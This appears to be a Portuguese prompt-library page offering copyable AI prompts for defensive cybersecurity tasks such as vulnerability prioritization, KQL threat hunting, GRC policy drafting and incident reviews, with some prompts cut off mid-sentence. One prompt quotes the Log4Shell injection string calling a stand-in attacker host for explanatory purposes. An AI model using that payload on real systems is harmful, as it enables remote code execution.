Copie qualquer um direto para o ChatGPT, Claude ou Gemini e troque os marcadores entre colchetes pelos seus próprios dados.
32 prompts para copiar
1Prompt de IA para Priorização de Vulnerabilidades
Você é um analista sênior de cibersegurança. Dados os seguintes dados de vulnerabilidade de uma varredura Nessus de um servidor web de produção (criticidade do ativo: alta), priorize as 3 principais vulnerabilidades para remediação imediata. Para cada uma, forneça uma justificativa de 1 frase que explique o risco específico no contexto, indo além da pontuação CVSS genérica. **Dados do Nessus:** 1. CVE-2023-34048 (CVSS 9.8): Vulnerabilidade de escrita fora dos limites do VMware vCenter Server. 2. CVE-2021-44228 (Log4Shell, CVSS 10.0): Execução remota de código Apache Log4j. O servidor está executando um aplicativo Java legado. 3. CVE-2024-21893 (CVSS 8.8): Vulnerabilidade SSRF do Ivanti Connect Secure. 4. Apache Struts sem patch (Nenhuma CVE específica fornecida, mas conhecido por ser vulnerável a RCE). 5. TLS 1.0 Habilitado (CVSS 2.6).
2Prompt para Elaborar uma Política de Gerenciamento de RMF
Aja como um analista de GRC. Preciso elaborar uma política para a função 'Gerenciar' do NIST AI RMF. Nossa organização usa Microsoft Defender for Endpoint para EDR, Pentera para validação de segurança automatizada e Credo AI para governança. Elabore uma seção de política que defina como os riscos identificados por essas ferramentas serão gerenciados. Especifique: 1. Os limites de severidade para resposta automatizada no Defender (por exemplo, o que aciona o isolamento automático do dispositivo). 2. O SLA para remediar vulnerabilidades 'Críticas' e 'Altas' encontradas pela Pentera. 3. O processo para registrar e rastrear problemas de viés de modelo identificados no Credo AI, incluindo propriedade e cadência de revisão.
Atue como um analista de segurança sênior. Tenho um relatório de vulnerabilidades de um scanner. Priorize as descobertas com base no seguinte contexto: - O ativo afetado é um servidor web público rodando Linux, marcado como 'crítico'. - A aplicação é uma plataforma de e-commerce que processa dados de cartão de crédito. - Nossas principais ameaças são grupos de ransomware e atacantes financeiros oportunistas. Aqui estão os dados da vulnerabilidade (em formato CSV): [[CVE-ID]], [[Pontuação CVSS]], [[Nome da Vulnerabilidade]], [[IP do Ativo]] CVE-2026-XXXX, 9.8, "Execução Remota de Código em Apache Struts", 1.2.3.4 CVE-2026-YYYY, 7.5, "Cross-Site Scripting em Web Framework", 1.2.3.4 Forneça uma lista priorizada de qual CVE abordar primeiro e explique seu raciocínio em uma tabela markdown.
Atue como um analista SOC. Preciso caçar sinais de persistência em endpoints Windows usando o Microsoft Sentinel. A técnica que procuro é a criação de um novo serviço e seu início em um curto período de tempo. Gere uma consulta Kusto Query Language (KQL) que: 1. Busque pelo ID de Evento Windows 4697 (um serviço foi instalado no sistema). 2. Busque pelo ID de Evento Windows 7036 (um serviço entrou no estado de execução). 3. Una esses eventos por ServiceName e host. 4. Filtre por instâncias onde o serviço foi iniciado dentro de 5 minutos após a instalação. 5. Liste o nome do host, nome do serviço e o usuário que o instalou.
. 1. Em termos simples, o que esta assinatura de malware tipicamente indica? 2. Qual é o comportamento comum desta família de malware? (por exemplo, ransomware, ladrão de informações, RAT) 3. Quais são os 3-5 próximos passos imediatos que um analista júnior deve tomar para investigar o host
Atue como um consultor de segurança. Preciso configurar uma varredura do Tenable Nessus para um novo segmento de nossa rede que contém `[[SERVER_TYPES]]` (por exemplo, servidores web, servidores de banco de dados, controladores de domínio). Recomende uma configuração de política de varredura do Nessus. Sua recomendação deve cobrir: - **Modelo de Varredura:** Qual modelo do Nessus usar como ponto de partida (por exemplo, Basic Network Scan, Credentialed Patch Audit). - **Credenciais:** Por que uma varredura credenciada é necessária. - **Plugins:** Quais famílias de plugins são mais importantes para habilitar para esses tipos de servidor. - **Frequência:** Uma frequência de varredura recomendada (por exemplo, semanal, mensal). Forneça a saída como um conjunto de recomendações claras com breves justificativas para cada uma.
, mas determinamos que é um falso positivo. Preciso escrever uma justificativa formal para nossos registros. Elabore um parágrafo que explique *por que* esta descoberta é um falso positivo. Use as seguintes informações: - **Descoberta:** O scanner identificou
Você é um analista de vulnerabilidades reportando ao CISO. Tenho uma lista de 5 vulnerabilidades críticas que foram descobertas esta semana. Crie uma tabela de resumo de alto nível para um relatório de gestão. A tabela deve ter as seguintes colunas: - `Vulnerabilidade (CVE)` - `Sistemas Afetados (Contagem)` - `Ação Recomendada` - `Equipe Atribuída` - `ETA de Remediação` Preencha a tabela usando estes dados: - **CVE-2026-1001:** Afeta 15 servidores web. Ação: Aplicar patch do fornecedor. Equipe: Web Ops. ETA: 7 dias. - **CVE-2026-1002:** Afeta 50 estações de trabalho. Ação: Implantar software atualizado via SCCM. Equipe: Desktop Engineering. ETA: 14 dias. - **CVE-2026-1003:** Afeta 2 controladores de domínio. Ação: Aplicar alteração na chave de registro. Equipe: Infrastructure. ETA: 3 dias. - **CVE-2026-1004:** Afeta 10 servidores Linux. Ação: Atualizar kernel. Equipe: Linux Ops. ETA: 10 dias. - **CVE-2026-1005:** Afeta 1 aplicação personalizada. Ação: Correção de código do desenvolvedor. Equipe: AppDev. ETA: 30 dias.
15Revisar Código em Busca de Riscos do OWASP Top 10
em busca de potenciais vulnerabilidades do OWASP Top 10, procurando especificamente por: - Falhas de Injeção (SQL, Comando) - Autenticação Quebrada - Exposição de Dados Sensíveis - Desserialização Insegura Para cada problema que encontrar, forneça: 1. O número da linha vulnerável. 2. Uma breve explicação da vulnerabilidade. 3. Um exemplo de código mostrando como corrigi-lo. Se nenhum problema for encontrado, declare isso. Trecho de Código:
Nossa varredura Snyk encontrou uma vulnerabilidade crítica (`[[CVE_ID]]`) na biblioteca de código aberto `[[LIBRARY_NAME]]`, versão `[[VERSION_NUMBER]]`. Explique esta vulnerabilidade a uma equipe de desenvolvimento. Sua explicação deve incluir: 1. O que a vulnerabilidade permite que um atacante faça (por exemplo, execução remota de código, negação de serviço). 2. Como a vulnerabilidade é acionada. 3. Qual é a ação recomendada (por exemplo, "Atualizar para a versão X.Y.Z"). Mantenha a explicação concisa e focada no que os desenvolvedores precisam saber para corrigi-la.
Atue como um engenheiro de segurança principal. Escreva uma diretriz de codificação segura para nossa equipe de desenvolvimento sobre o tópico "Validação de Entrada". A diretriz deve ser um documento markdown que inclua: - Uma breve e simples explicação de por que a validação de entrada é importante. - Uma seção "Fazer" com 2-3 melhores práticas (por exemplo, usar listas de permissão, validar no lado do servidor). - Uma seção "Não Fazer" com 2-3 erros comuns (por exemplo, confiar apenas na validação do lado do cliente, usar listas de bloqueio). - Um exemplo de código curto e claro em `[[LANGUAGE]]` mostrando uma implementação "ruim" versus "boa".
que é vulnerável à injeção SQL. Refatore o código para usar consultas parametrizadas (instruções preparadas) para prevenir esta vulnerabilidade. Mostre os blocos de código "antes" e "depois". Código Vulnerável:
Atue como um analista de GRC. Preciso elaborar uma nova política de segurança corporativa sobre "Uso Aceitável de Ferramentas de IA". A política deve ser estruturada com as seguintes seções: 1. **Propósito:** Por que esta política existe. 2. **Escopo:** A quem esta política se aplica. 3. **Declarações de Política:** Uma lista de regras, incluindo: - Proibição de usar ferramentas de IA públicas com dados sensíveis da empresa ou de clientes. - Requisito de usar apenas plataformas de IA aprovadas pela empresa. - Diretrizes para verificar a precisão do conteúdo gerado por IA. - Uma declaração sobre propriedade e confidencialidade dos dados. 4. **Aplicação:** As consequências da violação da política. Gere um rascunho profissional desta política.
Estou me preparando para uma auditoria. Preciso mapear nossos controles ISO 27001 existentes para os Critérios de Serviços de Confiança SOC 2. Para o seguinte controle ISO 27001, identifique os critérios SOC 2 correspondentes que ele ajuda a satisfazer. **Controle ISO 27001:** `[[ISO_CONTROL_DESCRIPTION]]` (por exemplo, "A.9.4.1: Restrição de acesso à informação") Forneça o TSC SOC 2 correspondente e uma breve explicação de uma frase do mapeamento. Exemplo de Saída: **TSC SOC 2:** CC6.1 - Segurança de Acesso Lógico **Explicação:** Este controle apoia diretamente o requisito SOC 2 de restringir o acesso lógico a informações e sistemas com base em funções e responsabilidades.
Estou conduzindo uma avaliação de risco em nossa nova implantação de `[[CLOUD_SERVICE_NAME]]`. Gere um cenário de risco relacionado a "Controles de Acesso Inadequados". O cenário deve ser estruturado com estes campos: - **Cenário de Risco:** Uma breve descrição de uma frase do evento. - **Ator da Ameaça:** Quem poderia causar isso (por exemplo, Insider Malicioso, Atacante Externo). - **Vulnerabilidade:** A fraqueza que permite isso (por exemplo, Funções IAM excessivamente permissivas). - **Impacto:** O resultado de negócios se ocorrer (por exemplo, Violação de dados, interrupção de serviço). - **Controles Existentes:** O que temos atualmente em vigor (por exemplo, MFA, registro básico). Preencha esta estrutura para o risco de "Controles de Acesso Inadequados".
24Traduzir Descobertas Técnicas para um Comitê de Risco
Preciso explicar o risco de uma vulnerabilidade Log4j não corrigida (CVE-2021-44228) a um comitê de risco não técnico. Traduza a seguinte descrição técnica em uma declaração de risco de negócios simples e baseada em analogias. Evite jargões como RCE, JNDI e LDAP. **Descrição Técnica:** "A vulnerabilidade Log4j permite a execução remota de código não autenticada (RCE) ao registrar uma string especialmente elaborada. Um atacante pode enviar uma string como `${jndi:ldap://attacker.com/a}` que faz com que o servidor se conecte de volta ao sistema do atacante e execute um payload malicioso." Concentre-se no que isso significa para o negócio (por exemplo, "É como deixar uma porta dos fundos destrancada...").
Você é um gerente sênior de resposta a incidentes. Nossa equipe acabou de resolver um incidente de `[[INCIDENT_TYPE]]`. Crie um esboço detalhado para um documento de Revisão Pós-Incidente (PIR). O esboço deve incluir todas as seções principais e sub-marcadores para os tópicos chave a serem abordados em cada uma. Inclua seções para: 1. Resumo Executivo 2. Linha do Tempo do Incidente (Eventos Chave) 3. Análise da Causa Raiz (O que falhou?) 4. Avaliação de Impacto (Negócios, Técnico, Financeiro) 5. Lições Aprendidas (O que correu bem? O que correu mal?) 6. Itens de Ação (Uma tabela com colunas para Ação, Responsável e Data de Vencimento)
28Formular Perguntas para uma Investigação Forense
Estamos iniciando uma investigação forense digital em um host comprometido (`[[HOSTNAME]]`) relacionada a um incidente de exfiltração de dados. Atue como um investigador forense líder. Gere uma lista das 10 principais perguntas que nossa investigação precisa responder. As perguntas devem ser focadas em estabelecer o escopo completo e a linha do tempo da violação. Exemplos: - Como o atacante obteve acesso inicial ao host? - Quais ferramentas o atacante usou no host? - Quais dados foram acessados ou exfiltrados do host?
29Elaborar uma Atualização de Comunicações Internas
Você é o chefe de comunicações corporativas, trabalhando com a equipe de segurança. Precisamos enviar uma breve atualização interna a todos os funcionários sobre um incidente de segurança recente que foi resolvido. O incidente foi um `[[INCIDENT_TYPE]]` que causou `[[IMPACT]]`. Elabore uma mensagem curta, tranquilizadora e não técnica para toda a equipe. A mensagem deve: - Reconhecer que uma interrupção ocorreu. - Confirmar que o problema foi resolvido. - Agradecer à equipe de segurança. - Lembrar os funcionários de permanecerem vigilantes e relatarem atividades suspeitas. Não inclua detalhes técnicos sobre o incidente.
Atue como um engenheiro sênior de segurança de aplicações. Revise o seguinte trecho de código Python em busca de potenciais vulnerabilidades de segurança, especificamente procurando por falhas de injeção (SQLi, Injeção de Comando), desserialização insegura e tratamento inadequado de erros. Para cada descoberta, forneça o número CWE, explique o risco no contexto deste código e sugira uma substituição de código específica e segura. [[COLE O TRECHO DE CÓDIGO AQUI]]
31Prompt para Mapeamento de Controles para o NIST AI RMF
Atue como um analista de GRC especializado em governança de IA. Tenho o seguinte controle de segurança do nosso Plano de Segurança do Sistema: "Todas as instâncias de banco de dados em nuvem são configuradas com criptografia em repouso usando AES-256." Mapeie este controle para as subcategorias relevantes dentro das Funções Centrais do NIST AI Risk Management Framework (AI RMF 1.0) (Governar, Mapear, Medir, Gerenciar). Para cada mapeamento, explique o raciocínio.
Quatro passos, cerca de um minuto. O prompt dá a estrutura; você dá os detalhes.
1
Escolha o prompt
Cada prompt aqui foi escrito para uma tarefa específica — não um modelo genérico do tipo “aja como um especialista”. Passe os olhos pelos títulos e pegue o que corresponde ao seu trabalho.
2
Copie e cole
Clique em Copiar e cole tudo no ChatGPT, Claude, Gemini ou no assistente que você já paga. Nada aqui depende de um único modelo.
3
Preencha os colchetes
Troque cada [Marcador entre colchetes] pelos seus próprios dados antes de enviar. É daí que vem a qualidade: o prompt dá a estrutura, você dá os detalhes.
4
Confira o guia de origem
O link “Origem” sob cada prompt abre o artigo completo: por que o prompt é assim, contra o que foi testado e com quais ferramentas combina.
Perguntas frequentes
As perguntas que aparecem antes de colar um destes prompts em um trabalho de verdade.
Estes prompts de IA são gratuitos?
Sim. Os 32 prompts desta página podem ser copiados e usados com qualquer assistente de IA, incluindo ChatGPT, Claude e Gemini. Basta ter conta em uma dessas ferramentas.
Como uso estes prompts de IA para cibersegurança?
Copie o texto completo com o botão Copiar, cole no seu assistente de IA e troque cada marcador entre colchetes — como [Sua cidade] ou [Nome da empresa] — pelos seus próprios dados antes de enviar.
De onde vêm estes prompts?
Cada prompt vem de um guia testado da Zekai. O link “Origem” sob cada prompt leva ao artigo completo, que explica o raciocínio e como ele foi testado.
Posso editar estes prompts?
Pode e deve. Trate cada um como estrutura de partida: aperte as instruções, acrescente suas restrições e fique com a versão que dá o melhor resultado. Os colchetes marcam o que sempre precisa mudar.
Bibliotecas de prompts para outras profissões
Mesmo formato, outra profissão — começando pelas mais próximas de cibersegurança.